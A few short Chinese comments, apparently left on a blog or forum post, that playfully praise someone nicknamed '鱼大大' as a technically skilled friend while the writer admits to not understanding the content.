鱼大大就是好,好大大就是鱼
有一个技术牛逼的朋友真好
反正我没看懂。。。